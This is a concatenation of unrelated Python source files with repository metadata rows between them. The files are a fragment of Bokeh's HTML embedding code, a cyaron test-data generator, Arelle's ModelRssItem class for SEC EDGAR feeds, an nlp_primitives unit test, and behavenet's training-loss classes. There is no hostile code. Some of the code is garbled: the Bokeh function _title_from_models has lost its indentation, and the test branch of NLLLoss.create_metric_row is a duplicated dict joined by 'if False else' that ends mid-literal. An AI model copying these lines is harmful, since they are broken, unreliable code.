            keys title, bokeh_js, bokeh_css, plot_script and plot_div are
            always overwritten

    Returns:
        UTF-8 encoded HTML
    """
    if title is None:
        title = DEFAULT_TITLE

    bokeh_js, bokeh_css = bundle

    script = bundle_all_models()
    script += _script_for_render_items(docs_json, render_items)

    # use None (not a mutable {}) as the default to avoid sharing one dict
    # across calls; copy so the caller's dict is never modified
    template_variables_full = {} if template_variables is None else template_variables.copy()
    template_variables_full.update(dict(
        title = title,
        bokeh_js = bokeh_js,
        bokeh_css = bokeh_css,
        plot_script = _wrap_in_script_tag(script),
        plot_div = "\n".join(_div_for_render_item(item) for item in render_items)
    ))

    html = template.render(template_variables_full)
    return encode_utf8(html)
def _check_models(models, allow_dict=False):
    """Normalize *models* to a list of Model/Document objects.

    A single Model or Document is wrapped in a list; a valid sequence (or,
    when *allow_dict* is set, a str-keyed dict of models) is returned as-is.
    Anything else raises ``ValueError``.
    """
    # single item -> one-element list
    if isinstance(models, (Model, Document)):
        return [models]

    # homogeneous sequence of models/documents
    if isinstance(models, Sequence) and all(isinstance(x, (Model, Document)) for x in models):
        return models

    # optionally, a dict mapping string labels to models/documents
    if allow_dict and isinstance(models, dict) and \
            all(isinstance(x, string_types) for x in models.keys()) and \
            all(isinstance(x, (Model, Document)) for x in models.values()):
        return models

    if allow_dict:
        raise ValueError(
            'Input must be a Model, a Document, a Sequence of Models and Document, or a dictionary from string to Model and Document'
        )
    raise ValueError('Input must be a Model, a Document, or a Sequence of Models and Document')
def _check_one_model(model):
    """Validate that *model* is exactly one Model/Document and return it."""
    checked = _check_models(model)
    if len(checked) != 1:
        raise ValueError("Input must be exactly one Model or Document")
    return checked[0]
def _div_for_render_item(item):
    """Render the placeholder ``<div>`` BokehJS will target for *item*."""
    return PLOT_DIV.render(elementid=item['elementid'])
# come up with our best title
def _title_from_models(models, title):
# use override title
if title is not None:
return title
# use title from any listed document
for p in models:
if isinstance(p, Document):
return p.title
# use title from any model's document
for p in models:
if p.document is not None:
return p.document.title
# use default title
return DEFAULT_TITLE
def _standalone_docs_json_and_render_items(models):
    """Serialize the documents owning *models* and build one render item per
    input model.

    Returns ``(docs_json, render_items)`` where ``docs_json`` maps generated
    doc ids to ``Document.to_json()`` output and each render item is a dict
    with ``docid``, ``elementid`` and ``modelid`` keys.
    """
    models = _check_models(models)

    render_items = []
    docs_by_id = {}
    for p in models:
        modelid = None
        if isinstance(p, Document):
            doc = p
        else:
            if p.document is None:
                raise ValueError("To render a Model as HTML it must be part of a Document")
            doc = p.document
            modelid = p._id
        docid = None
        # linear scan to reuse the id of a document already seen (the dict is
        # keyed by generated id, so we cannot look the document up directly)
        for key in docs_by_id:
            if docs_by_id[key] == doc:
                docid = key
        if docid is None:
            docid = make_id()
            docs_by_id[docid] = doc
        elementid = make_id()
        render_items.append({
            'docid' : docid,
            'elementid' : elementid,
            # if modelid is None, that means the entire document
            'modelid' : modelid
            })

    docs_json = {}
    for k, v in docs_by_id.items():
        docs_json[k] = v.to_json()

    return (docs_json, render_items)
# TODO this is a theory about what file_html() "should" be,
# with a more explicit name similar to the server names below,
# and without the jinja2 entanglement. Thus this encapsulates that
# we use jinja2 and encapsulates the exact template variables we require.
# Anyway, we should deprecate file_html or else drop this version,
# most likely.
def standalone_html_page_for_models(models, resources, title):
    ''' Return an HTML document that renders zero or more Bokeh documents or models.

    The document for each model will be embedded directly in the HTML, so the
    resulting HTML file is standalone (does not require a server). Depending
    on the provided resources, the HTML file may be completely self-contained
    or may have to load JS and CSS from different files.

    .. deprecated:: 0.12.5
        Use :func:`file_html` instead; this function merely delegates to it.

    Args:
        models (Model or Document) : Bokeh object to render
            typically a Model or a Document
        resources (Resources) : a resource configuration for BokehJS assets
        title (str) : a title for the HTML document ``<title>`` tags or None to use the document title

    Returns:
        UTF-8 encoded HTML

    '''
    deprecated((0, 12, 5), 'bokeh.io.standalone_html_page_for_models', 'bokeh.io.file_html')
    return file_html(models, resources, title)
def server_html_page_for_models(session_id, model_ids, resources, title, template=FILE):
    """Render an HTML page that loads the given models from a server session.

    Each id in *model_ids* gets its own render item/div; a ``None`` id is a
    usage error and raises ``ValueError``.
    """
    render_items = []
    for model_id in model_ids:
        if model_id is None:
            raise ValueError("None found in list of model_ids")

        render_items.append({
            'sessionid' : session_id,
            'elementid' : make_id(),
            'modelid'   : model_id,
        })

    bundle = _bundle_for_objs_and_resources(None, resources)
    return _html_page_for_render_items(bundle, {}, render_items, title, template=template)
def server_html_page_for_session(session_id, resources, title, template=FILE, template_variables=None):
    """Render an HTML page that loads an entire server session document.

    The single render item carries no ``modelid``, which tells BokehJS to
    render the whole session document; ``use_for_title`` lets the document
    title drive the page title.
    """
    render_items = [{
        'sessionid'     : session_id,
        'elementid'     : make_id(),
        'use_for_title' : True,
        # no 'modelid' implies the entire session document
    }]

    bundle = _bundle_for_objs_and_resources(None, resources)
    return _html_page_for_render_items(
        bundle, dict(), render_items, title, template=template,
        template_variables=template_variables if template_variables is not None else {})
| 35.152228 | 140 | 0.651903 |
53e36e4915954eeb17840b010d2f344e584923d3 | 720 | py | Python | E5-D/generator.py | Matrix53/algo | 7a176dac9ed9c6ad65d1514afb6388f7ee6b912a | [
"MIT"
] | 1 | 2021-12-14T08:54:11.000Z | 2021-12-14T08:54:11.000Z | E5-D/generator.py | Matrix53/algo | 7a176dac9ed9c6ad65d1514afb6388f7ee6b912a | [
"MIT"
] | null | null | null | E5-D/generator.py | Matrix53/algo | 7a176dac9ed9c6ad65d1514afb6388f7ee6b912a | [
"MIT"
] | 1 | 2021-12-13T09:31:40.000Z | 2021-12-13T09:31:40.000Z | from cyaron import *
code_path = 'D:/Workspace/algo/E5-B/'
# big data
io = IO('1.in', '1.out')
io.input_writeln(500, 1000, 250000)
graph = Graph.graph(500, 1000, directed=True, weight_limit=(0, 10000000))
io.input_writeln(graph.to_str(shuffle=True))
for u in range(1, 501):
for v in range(1, 501):
io.input_writeln(u, v)
io.output_gen(code_path + 'standard.exe')
io.close()
# big data
io = IO('2.in', '2.out')
io.input_writeln(500, 250000, 250000)
graph = Graph.graph(500, 250000, directed=True, weight_limit=(0, 10000000))
io.input_writeln(graph.to_str(shuffle=True))
for u in range(1, 501):
for v in range(1, 501):
io.input_writeln(u, v)
io.output_gen(code_path + 'standard.exe')
io.close()
| 27.692308 | 75 | 0.686111 |
4c170c1c02b9668700198082b53626d504ad085e | 8,016 | py | Python | arelle/ModelRssItem.py | hamscher/Arelle | 64c1beddcc7163e571011faf07a03d8ffe18bb78 | [
"Apache-2.0"
] | 292 | 2015-01-27T03:31:51.000Z | 2022-03-26T07:00:05.000Z | arelle/ModelRssItem.py | hamscher/Arelle | 64c1beddcc7163e571011faf07a03d8ffe18bb78 | [
"Apache-2.0"
] | 94 | 2015-04-18T23:03:00.000Z | 2022-03-28T17:24:55.000Z | arelle/ModelRssItem.py | hamscher/Arelle | 64c1beddcc7163e571011faf07a03d8ffe18bb78 | [
"Apache-2.0"
] | 200 | 2015-01-13T03:55:47.000Z | 2022-03-29T12:38:56.000Z | '''
Created on Nov 11, 2010
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
import os
from arelle import XmlUtil
from arelle.ModelObject import ModelObject
# default option values for the RSS-watch feature; one entry per field
# configurable in the RSS watch dialog
newRssWatchOptions = {
    "feedSource": "",
    "feedSourceUri": None,
    "matchTextExpr": "",
    "formulaFileUri": "",
    "logFileUri": "",
    "emailAddress": "",
    "validateXbrlRules": False,
    "validateDisclosureSystemRules": False,
    "validateCalcLinkbase": False,
    "validateFormulaAssertions": False,
    "alertMatchedFactText": False,
    "alertAssertionUnsuccessful": False,
    "alertValiditionError": False,
    "latestPubDate": None,
}
# Note: if adding to this list keep DialogRssWatch in sync
class ModelRssItem(ModelObject):
    """Model object for one ``<item>`` of an SEC EDGAR RSS feed.

    Exposes the EDGAR-namespaced child elements (CIK, accession number,
    filing dates, referenced files, ...) as convenience properties, and
    tracks validation status/results for the RSS-watch feature.
    """
    def init(self, modelDocument):
        super(ModelRssItem, self).init(modelDocument)
        try:
            # items published on or before the last watched pub date have
            # already been processed in a prior run
            if (self.modelXbrl.modelManager.rssWatchOptions.latestPubDate and
                self.pubDate <= self.modelXbrl.modelManager.rssWatchOptions.latestPubDate):
                self.status = _("tested")
            else:
                self.status = _("not tested")
        except AttributeError:
            self.status = _("not tested")
        self.results = None
        self.assertions = None
        # find edgar namespace
        self.edgr = None
        for elt in self.iterdescendants("{*}xbrlFiling"):
            self.edgr = elt.qname.namespaceURI
            break
        if self.edgr:
            edgrPrefix = "{" + self.edgr + "}"
        else:
            edgrPrefix = ""
        # precompute Clark-notation tag names for the EDGAR child elements
        self.edgrDescription = edgrPrefix + "description"
        self.edgrFile = edgrPrefix + "file"
        self.edgrInlineXBRL = edgrPrefix + "inlineXBRL"
        self.edgrSequence = edgrPrefix + "sequence"
        self.edgrType = edgrPrefix + "type"
        self.edgrUrl = edgrPrefix + "url"
    @property
    def cikNumber(self):
        # SEC Central Index Key of the filer
        return XmlUtil.text(XmlUtil.descendant(self, self.edgr, "cikNumber"))
    @property
    def accessionNumber(self):
        return XmlUtil.text(XmlUtil.descendant(self, self.edgr, "accessionNumber"))
    @property
    def fileNumber(self):
        return XmlUtil.text(XmlUtil.descendant(self, self.edgr, "fileNumber"))
    @property
    def companyName(self):
        return XmlUtil.text(XmlUtil.descendant(self, self.edgr, "companyName"))
    @property
    def formType(self):
        return XmlUtil.text(XmlUtil.descendant(self, self.edgr, "formType"))
    @property
    def pubDate(self):
        # RFC-822 pubDate parsed into a datetime; cached after first access
        try:
            return self._pubDate
        except AttributeError:
            from arelle.UrlUtil import parseRfcDatetime
            self._pubDate = parseRfcDatetime(XmlUtil.text(XmlUtil.descendant(self, None, "pubDate")))
            return self._pubDate
    @property
    def filingDate(self):
        # filingDate is formatted MM/DD/YYYY; cached after first access
        try:
            return self._filingDate
        except AttributeError:
            import datetime
            self._filingDate = None
            date = XmlUtil.text(XmlUtil.descendant(self, self.edgr, "filingDate"))
            d = date.split("/")
            if d and len(d) == 3:
                # NOTE: _INT is not defined in this module; presumably
                # provided at runtime by arelle (verify)
                self._filingDate = datetime.date(_INT(d[2]),_INT(d[0]),_INT(d[1]))
            return self._filingDate
    @property
    def period(self):
        # period element is YYYYMMDD; return ISO-style YYYY-MM-DD
        per = XmlUtil.text(XmlUtil.descendant(self, self.edgr, "period"))
        if per and len(per) == 8:
            return "{0}-{1}-{2}".format(per[0:4],per[4:6],per[6:8])
        return None
    @property
    def assignedSic(self):
        return XmlUtil.text(XmlUtil.descendant(self, self.edgr, "assignedSic"))
    @property
    def acceptanceDatetime(self):
        # acceptanceDatetime element is YYYYMMDDHHMMSS; cached after first access
        try:
            return self._acceptanceDatetime
        except AttributeError:
            import datetime
            self._acceptanceDatetime = None
            date = XmlUtil.text(XmlUtil.descendant(self, self.edgr, "acceptanceDatetime"))
            if date and len(date) == 14:
                self._acceptanceDatetime = datetime.datetime(_INT(date[0:4]),_INT(date[4:6]),_INT(date[6:8]),_INT(date[8:10]),_INT(date[10:12]),_INT(date[12:14]))
            return self._acceptanceDatetime
    @property
    def fiscalYearEnd(self):
        # fiscalYearEnd element is MMDD; return MM-DD
        yrEnd = XmlUtil.text(XmlUtil.descendant(self, self.edgr, "fiscalYearEnd"))
        if yrEnd and len(yrEnd) == 4:
            return "{0}-{1}".format(yrEnd[0:2],yrEnd[2:4])
        return None
    @property
    def htmlUrl(self):  # main filing document
        # the xbrlFile with sequence "1" is the primary HTML document
        htmlDocElt = XmlUtil.descendant(self, self.edgr, "xbrlFile", attrName=self.edgrSequence, attrValue="1")
        if htmlDocElt is not None:
            return htmlDocElt.get(self.edgrUrl)
        return None
    @property
    def url(self):
        # URL of the instance document: first xbrlFile whose type ends in
        # ".INS" or which is flagged as inline XBRL; cached after first access
        try:
            return self._url
        except AttributeError:
            self._url = None
            for instDocElt in XmlUtil.descendants(self, self.edgr, "xbrlFile"):
                if instDocElt.get(self.edgrType).endswith(".INS") or instDocElt.get(self.edgrInlineXBRL) == "true":
                    self._url = instDocElt.get(self.edgrUrl)
                    break
            return self._url
    @property
    def enclosureUrl(self):
        return XmlUtil.childAttr(self, None, "enclosure", "url")
    @property
    def zippedUrl(self):
        # address the instance file inside the zip enclosure, when one exists
        enclosure = XmlUtil.childAttr(self, None, "enclosure", "url")
        if enclosure:
            # modify url to use zip file
            _path, sep, file = (self.url or "").rpartition("/")
            # return path + sep + self.accessionNumber + "-xbrl.zip" + sep + file
            return enclosure + sep + file
        else: # no zipped enclosure, just use unzipped file
            return self.url
    @property
    def htmURLs(self):
        # (description, url) pairs for all .htm files; cached after first access
        try:
            return self._htmURLs
        except AttributeError:
            self._htmURLs = [
                (instDocElt.get(self.edgrDescription),instDocElt.get(self.edgrUrl))
                for instDocElt in XmlUtil.descendants(self, self.edgr, "xbrlFile")
                if instDocElt.get(self.edgrFile).endswith(".htm")]
            return self._htmURLs
    @property
    def primaryDocumentURL(self):
        # URL of the xbrlFile whose type matches the filing's form type
        try:
            return self._primaryDocumentURL
        except AttributeError:
            formType = self.formType
            self._primaryDocumentURL = None
            for instDocElt in XmlUtil.descendants(self, self.edgr, "xbrlFile"):
                if instDocElt.get(self.edgrType) == formType:
                    self._primaryDocumentURL = instDocElt.get(self.edgrUrl)
                    break
            return self._primaryDocumentURL
    def setResults(self, modelXbrl):
        """Record validation outcome from *modelXbrl* onto this item."""
        self.results = []
        self.assertionUnsuccessful = False
        # put error codes first, sorted, then assertion result (dict's)
        self.status = "pass"
        for error in modelXbrl.errors:
            if isinstance(error,dict):  # assertion results
                self.assertions = error
                # NOTE(review): .items() unpacks (key, value) pairs, yet both
                # names suggest counts -- verify the layout of this dict
                for countSuccessful, countNotsuccessful in error.items():
                    if countNotsuccessful > 0:
                        self.assertionUnsuccessful = True
                        self.status = "unsuccessful"
            else:   # error code results
                self.results.append(error)
                self.status = "fail" # error code
        self.results.sort()
    @property
    def propertyView(self):
        # (label, value) pairs for display in arelle's property view
        return (("CIK", self.cikNumber),
                ("company", self.companyName),
                ("published", self.pubDate),
                ("form type", self.formType),
                ("filing date", self.filingDate),
                ("period", self.period),
                ("year end", self.fiscalYearEnd),
                ("status", self.status),
                ("instance", os.path.basename(self.url)),
                )
    def __repr__(self):
        return ("rssItem[{0}]{1})".format(self.objectId(),self.propertyView))
| 36.271493 | 162 | 0.58508 |
e0ce55a54be57bb281a21e6d9008a577d9153b7a | 1,216 | py | Python | nlp_primitives/tests/test_upper_case_count.py | mikewcasale/nlp_primitives | e42ff518f78fe2398c156e559b6d0fe222fd5cdd | [
"BSD-3-Clause"
] | 2 | 2021-04-05T03:56:21.000Z | 2022-03-09T09:05:55.000Z | nlp_primitives/tests/test_upper_case_count.py | mikewcasale/nlp_primitives | e42ff518f78fe2398c156e559b6d0fe222fd5cdd | [
"BSD-3-Clause"
] | null | null | null | nlp_primitives/tests/test_upper_case_count.py | mikewcasale/nlp_primitives | e42ff518f78fe2398c156e559b6d0fe222fd5cdd | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
import pandas as pd
from ..upper_case_count import UpperCaseCount
from ..utils import PrimitiveT, find_applicable_primitives, valid_dfs
class TestUpperCaseCount(PrimitiveT):
primitive = UpperCaseCount
def test_strings(self):
x = pd.Series(['This IS a STRING.',
'Testing AaA',
'Testing AAA-BBB',
'testing aaa'])
primitive_func = self.primitive().get_function()
answers = pd.Series([9.0, 3.0, 7.0, 0.0])
pd.testing.assert_series_equal(primitive_func(x), answers, check_names=False)
def test_nan(self):
x = pd.Series([np.nan,
'',
'This IS a STRING.'])
primitive_func = self.primitive().get_function()
answers = pd.Series([np.nan, 0.0, 9.0])
pd.testing.assert_series_equal(primitive_func(x), answers, check_names=False)
def test_with_featuretools(self, es):
transform, aggregation = find_applicable_primitives(self.primitive)
primitive_instance = self.primitive()
transform.append(primitive_instance)
valid_dfs(es, aggregation, transform, self.primitive.name.upper())
| 36.848485 | 85 | 0.630757 |
7a9b98618b92d87198df75daa8c6d19fb3676236 | 28,208 | py | Python | behavenet/fitting/training.py | cxrodgers/behavenet | 061b0b30f5d03b9d5be0dd965d81dc37b7409070 | [
"MIT"
] | null | null | null | behavenet/fitting/training.py | cxrodgers/behavenet | 061b0b30f5d03b9d5be0dd965d81dc37b7409070 | [
"MIT"
] | null | null | null | behavenet/fitting/training.py | cxrodgers/behavenet | 061b0b30f5d03b9d5be0dd965d81dc37b7409070 | [
"MIT"
] | null | null | null | """Functions and classes for fitting PyTorch models with stochastic gradient descent."""
import copy
import os
import numpy as np
from tqdm import tqdm
import torch
from torch import nn
from sklearn.metrics import r2_score, accuracy_score
from behavenet.fitting.eval import export_latents
from behavenet.fitting.eval import export_predictions
# TODO: use epoch number as rng seed so that batches are served in a controllable way?
# TODO: make it easy to finish training if unexpectedly stopped
# TODO: save models at prespecified intervals (check ae recon as a func of epoch w/o retraining)
# TODO: fix early stopping (at least for AEs)
class FitMethod(object):
    """Base method for defining model losses and tracking loss metrics.

    Loss metrics are tracked for the aggregate dataset (potentially spanning multiple sessions) as
    well as session-specific metrics for easier downstream plotting.

    Metrics live in two parallel structures:

    - ``self.metrics[dtype][metric]`` — aggregated over all datasets
    - ``self.metrics_by_dataset[dataset][dtype][metric]`` — per-dataset (only when
      ``n_datasets > 1``)

    The special dtype ``'curr'`` is a scratch slot: subclasses write per-batch values into it
    from :meth:`calc_loss`, and :meth:`update_metrics` folds those values into the running
    totals and zeroes the scratch slot again.
    """

    def __init__(self, model, metric_strs, n_datasets=1):
        """
        Parameters
        ----------
        model : :obj:`PyTorch` model
        metric_strs : :obj:`list` of :obj:`strs`
            names of metrics to be tracked, e.g. 'epoch', 'batch', 'train_loss', etc.
        n_datasets : :obj:`int`
            total number of datasets (sessions) served by data generator

        """
        self.model = model
        self.metrics = {}
        self.n_datasets = n_datasets
        # 'curr' holds the most recent batch's values before they are accumulated
        dtype_strs = ['train', 'val', 'test', 'curr']

        # aggregate metrics over all datasets
        for dtype in dtype_strs:
            self.metrics[dtype] = {}
            for metric in metric_strs:
                self.metrics[dtype][metric] = 0

        # separate metrics by dataset
        if self.n_datasets > 1:
            self.metrics_by_dataset = []
            for dataset in range(self.n_datasets):
                self.metrics_by_dataset.append({})
                for dtype in dtype_strs:
                    self.metrics_by_dataset[dataset][dtype] = {}
                    for metric in metric_strs:
                        self.metrics_by_dataset[dataset][dtype][metric] = 0
        else:
            # single-session fits skip the per-dataset bookkeeping entirely
            self.metrics_by_dataset = None

    def get_parameters(self):
        """Get all model parameters that have gradient updates turned on."""
        return filter(lambda p: p.requires_grad, self.model.parameters())

    def calc_loss(self, data, **kwargs):
        """Calculate loss on data.

        Subclasses must implement this; they are expected to call ``backward()`` on the loss
        and write per-batch values into ``self.metrics['curr']``.
        """
        raise NotImplementedError

    def get_loss(self, dtype):
        """Return loss aggregated over all datasets.

        Parameters
        ----------
        dtype : :obj:`str`
            datatype to calculate loss for (e.g. 'train', 'val', 'test')

        Returns
        -------
        :obj:`float`
            total loss divided by the number of batches accumulated so far

        """
        return self.metrics[dtype]['loss'] / self.metrics[dtype]['batches']

    def create_metric_row(
            self, dtype, epoch, batch, dataset, trial, best_epoch=None,
            by_dataset=False, *args, **kwargs):
        """Export metrics and other data (e.g. epoch) for logging train progress.

        Parameters
        ----------
        dtype : :obj:`str`
            'train' | 'val' | 'test'
        epoch : :obj:`int`
            current training epoch
        batch : :obj:`int`
            current training batch
        dataset : :obj:`int`
            dataset id for current batch
        trial : :obj:`int` or :obj:`NoneType`
            trial id within the current dataset
        best_epoch : :obj:`int`, optional
            best current training epoch
        by_dataset : :obj:`bool`, optional
            :obj:`True` to return metrics for a specific dataset, :obj:`False` to return metrics
            aggregated over multiple datasets

        Returns
        -------
        :obj:`dict`
            aggregated metrics for current epoch/batch

        """
        if by_dataset and self.n_datasets > 1:
            loss = self.metrics_by_dataset[dataset][dtype]['loss'] \
                / self.metrics_by_dataset[dataset][dtype]['batches']
        else:
            # aggregate row; dataset id of -1 marks "all datasets" in the logs
            dataset = -1
            loss = self.metrics[dtype]['loss'] / self.metrics[dtype]['batches']
        if dtype == 'train':
            metric_row = {
                'epoch': epoch,
                'batch': batch,
                'dataset': dataset,
                'trial': trial,
                'tr_loss': loss}
        elif dtype == 'val':
            metric_row = {
                'epoch': epoch,
                'batch': batch,
                'dataset': dataset,
                'trial': trial,
                'val_loss': loss,
                'best_val_epoch': best_epoch}
        elif dtype == 'test':
            metric_row = {
                'epoch': epoch,
                'batch': batch,
                'dataset': dataset,
                'trial': trial,
                'test_loss': loss}
        else:
            raise ValueError("%s is an invalid data type" % dtype)
        return metric_row

    def reset_metrics(self, dtype):
        """Reset all metrics.

        Parameters
        ----------
        dtype : :obj:`str`
            datatype to reset metrics for (e.g. 'train', 'val', 'test')

        """
        # reset aggregate metrics
        for key in self.metrics[dtype].keys():
            self.metrics[dtype][key] = 0
        # reset separated metrics
        if self.n_datasets > 1:
            for dataset in range(self.n_datasets):
                for key in self.metrics_by_dataset[dataset][dtype].keys():
                    self.metrics_by_dataset[dataset][dtype][key] = 0

    def update_metrics(self, dtype, dataset=None):
        """Update metrics for a specific dtype/dataset.

        Folds the per-batch values in ``self.metrics['curr']`` into the running totals
        for ``dtype`` (and for ``dataset``, when tracking multiple sessions), then zeroes
        the scratch values so the next batch starts clean. A ``None`` scratch value is
        left untouched and not accumulated (used by subclasses for metrics that do not
        apply to the current noise distribution).

        Parameters
        ----------
        dtype : :obj:`str`
            dataset type to update metrics for (e.g. 'train', 'val', 'test')
        dataset : :obj:`int` or :obj:`NoneType`, optional
            if :obj:`NoneType`, updates the aggregated metrics; if :obj:`int`, updates the
            associated dataset/session

        """
        for key in self.metrics[dtype].keys():
            if self.metrics['curr'][key] is not None:
                # update aggregate methods
                self.metrics[dtype][key] += self.metrics['curr'][key]
                # update separated metrics
                if dataset is not None and self.n_datasets > 1:
                    self.metrics_by_dataset[dataset][dtype][key] += \
                        self.metrics['curr'][key]
                # reset current metrics
                self.metrics['curr'][key] = 0
class AELoss(FitMethod):
    """MSE loss for non-variational autoencoders."""

    def __init__(self, model, n_datasets=1):
        super().__init__(model, ['batches', 'loss'], n_datasets=n_datasets)

    def calc_loss(self, data, dataset=0, **kwargs):
        """Calculate MSE loss for autoencoder.

        The batch is split into chunks if larger than a hard-coded `chunk_size` to keep memory
        requirements low; gradients are accumulated across all chunks before a gradient step is
        taken.

        Parameters
        ----------
        data : :obj:`dict`
            batch of data; keys should include 'images' and 'masks', if necessary
        dataset : :obj:`int`, optional
            used for session-specific io layers

        """
        if self.model.hparams['device'] == 'cuda':
            data = {key: val.to('cuda') for key, val in data.items()}

        y = data['images'][0]
        masks = data['masks'][0] if 'masks' in data else None

        def mse(target, recon, mask):
            # pixel-wise squared error, optionally weighted by a mask
            if mask is None:
                return torch.mean((target - recon) ** 2)
            return torch.mean(((target - recon) ** 2) * mask)

        chunk_size = 200
        n_examples = y.shape[0]
        if n_examples > chunk_size:
            # process the batch in chunks, accumulating gradients as we go
            n_chunks = int(np.ceil(n_examples / chunk_size))
            loss_val = 0
            for i_chunk in range(n_chunks):
                beg = i_chunk * chunk_size
                end = min((i_chunk + 1) * chunk_size, n_examples)
                y_mu, _ = self.model(y[beg:end], dataset=dataset)
                mask_chunk = None if masks is None else masks[beg:end]
                loss = mse(y[beg:end], y_mu, mask_chunk)
                # accumulate gradients across chunks
                loss.backward()
                # weight each chunk's mean loss by its size
                loss_val += loss.item() * (end - beg)
            loss_val /= n_examples
        else:
            y_mu, _ = self.model(y, dataset=dataset)
            loss = mse(y, y_mu, masks)
            loss.backward()
            loss_val = loss.item()

        # stash per-batch values for update_metrics
        self.metrics['curr']['loss'] = loss_val
        self.metrics['curr']['batches'] = 1
class NLLLoss(FitMethod):
    """Negative log-likelihood loss for supervised models (en/decoders).

    The concrete loss function is chosen in the constructor from the model's
    ``hparams['noise_dist']`` ('gaussian' | 'gaussian-full' | 'poisson' | 'categorical').
    In addition to the loss itself, an R^2 (continuous targets) or fraction-correct
    (categorical targets) metric is tracked per batch.
    """

    def __init__(self, model, n_datasets=1):
        # per-dataset tracking is not implemented for this loss
        if n_datasets > 1:
            raise ValueError('NLLLoss only supports single datasets')

        metric_strs = ['batches', 'loss', 'r2', 'fc']
        super().__init__(model, metric_strs, n_datasets=n_datasets)

        # choose loss based on noise distribution of the model
        if self.model.hparams['noise_dist'] == 'gaussian':
            self._loss = nn.MSELoss()
        elif self.model.hparams['noise_dist'] == 'gaussian-full':
            from behavenet.fitting.losses import GaussianNegLogProb
            self._loss = GaussianNegLogProb()  # model holds precision mat
        elif self.model.hparams['noise_dist'] == 'poisson':
            self._loss = nn.PoissonNLLLoss(log_input=False)
        elif self.model.hparams['noise_dist'] == 'categorical':
            self._loss = nn.CrossEntropyLoss()
        else:
            raise ValueError('"%s" is not a valid noise dist' % self.model.hparams['noise_dist'])

    def calc_loss(self, data, **kwargs):
        """Calculate negative log-likelihood loss for supervised models.

        The batch is split into chunks if larger than a hard-coded `chunk_size` to keep memory
        requirements low; gradients are accumulated across all chunks before a gradient step is
        taken. Each chunk is padded by `n_max_lags` samples on both sides so that predictions
        near the chunk boundaries see a full temporal context; the loss is only evaluated on
        the interior (non-padded) window.

        Parameters
        ----------
        data : :obj:`dict`
            signals are of shape (1, time, n_channels)

        """
        if self.model.hparams['device'] == 'cuda':
            data = {key: val.to('cuda') for key, val in data.items()}

        predictors = data[self.model.hparams['input_signal']][0]
        targets = data[self.model.hparams['output_signal']][0]

        max_lags = self.model.hparams['n_max_lags']

        chunk_size = 200
        batch_size = targets.shape[0]
        if batch_size > chunk_size:
            # split into chunks
            n_chunks = int(np.ceil(batch_size / chunk_size))
            outputs_all = []
            loss_val = 0
            for chunk in range(n_chunks):
                # take chunks of size chunk_size, plus overlap due to max_lags
                idx_beg = np.max([chunk * chunk_size - max_lags, 0])
                idx_end = np.min([(chunk + 1) * chunk_size + max_lags, batch_size])
                outputs, precision = self.model(predictors[idx_beg:idx_end])
                # define loss on allowed window of data
                if self.model.hparams['noise_dist'] == 'gaussian-full':
                    loss = self._loss(
                        outputs[max_lags:-max_lags],
                        targets[idx_beg:idx_end][max_lags:-max_lags],
                        precision[max_lags:-max_lags])
                else:
                    loss = self._loss(
                        outputs[max_lags:-max_lags],
                        targets[idx_beg:idx_end][max_lags:-max_lags])
                # compute gradients
                loss.backward()
                # get loss value (weighted by batch size)
                loss_val += loss.item() * outputs[max_lags:-max_lags].shape[0]
                outputs_all.append(
                    outputs[max_lags:-max_lags].cpu().detach().numpy())
            loss_val /= targets.shape[0]
            outputs_all = np.concatenate(outputs_all, axis=0)
        else:
            outputs, precision = self.model(predictors)
            # define loss on allowed window of data
            if self.model.hparams['noise_dist'] == 'gaussian-full':
                loss = self._loss(
                    outputs[max_lags:-max_lags],
                    targets[max_lags:-max_lags],
                    precision[max_lags:-max_lags])
            else:
                loss = self._loss(
                    outputs[max_lags:-max_lags],
                    targets[max_lags:-max_lags])
            # compute gradients
            loss.backward()
            # get loss value
            loss_val = loss.item()
            outputs_all = outputs[max_lags:-max_lags].cpu().detach().numpy()

        if self.model.hparams['noise_dist'] == 'gaussian' \
                or self.model.hparams['noise_dist'] == 'gaussian-full':
            # use variance-weighted r2s to ignore small-variance latents
            r2 = r2_score(
                targets[max_lags:-max_lags].cpu().detach().numpy(),
                outputs_all,
                multioutput='variance_weighted')
            fc = None
        elif self.model.hparams['noise_dist'] == 'poisson':
            raise NotImplementedError
        elif self.model.hparams['noise_dist'] == 'categorical':
            r2 = None
            # fraction correct: argmax over class logits vs integer targets
            fc = accuracy_score(
                targets[max_lags:-max_lags].cpu().detach().numpy(),
                np.argmax(outputs_all, axis=1))
        else:
            raise ValueError(
                '"%s" is not a valid noise_dist' %
                self.model.hparams['noise_dist'])

        # store current metrics; None entries are skipped by update_metrics, so the
        # inapplicable metric (r2 or fc) stays at its accumulated value (0 initially)
        self.metrics['curr']['loss'] = loss_val
        self.metrics['curr']['r2'] = r2
        self.metrics['curr']['fc'] = fc
        self.metrics['curr']['batches'] = 1

    def create_metric_row(
            self, dtype, epoch, batch, dataset, trial, best_epoch=None, by_dataset=False,
            *args, **kwargs):
        """Export metrics and other data (e.g. epoch) for logging train progress.

        Parameters
        ----------
        dtype : :obj:`str`
            'train' | 'val' | 'test'
        epoch : :obj:`int`
            current training epoch
        batch : :obj:`int`
            current training batch
        dataset : :obj:`int`
            dataset id for current batch
        trial : :obj:`int` or :obj:`NoneType`
            trial id within the current dataset
        best_epoch : :obj:`int`, optional
            best current training epoch
        by_dataset : :obj:`bool`, optional
            :obj:`True` to return metrics for a specific dataset, :obj:`False` to return metrics
            aggregated over multiple datasets

        Returns
        -------
        :obj:`dict`
            aggregated metrics for current epoch/batch

        """
        norm = self.metrics[dtype]['batches']
        loss = self.metrics[dtype]['loss'] / norm
        r2 = self.metrics[dtype]['r2'] / norm
        fc = self.metrics[dtype]['fc'] / norm
        if dtype == 'train':
            metric_row = {
                'epoch': epoch,
                'batch': batch,
                'dataset': dataset,
                'trial': trial,
                'tr_loss': loss,
                'tr_r2': r2,
                'tr_fc': fc}
        elif dtype == 'val':
            metric_row = {
                'epoch': epoch,
                'batch': batch,
                'dataset': dataset,
                'trial': trial,
                'val_loss': loss,
                'val_r2': r2,
                'val_fc': fc,
                'best_val_epoch': best_epoch}
        elif dtype == 'test':
            metric_row = {
                'epoch': epoch,
                'batch': batch,
                'dataset': dataset,
                'trial': trial,
                'test_loss': loss,
                'test_fc': fc,
                'test_r2': r2} if False else {
                'epoch': epoch,
                'batch': batch,
                'dataset': dataset,
                'trial': trial,
                'test_loss': loss,
                'test_r2': r2,
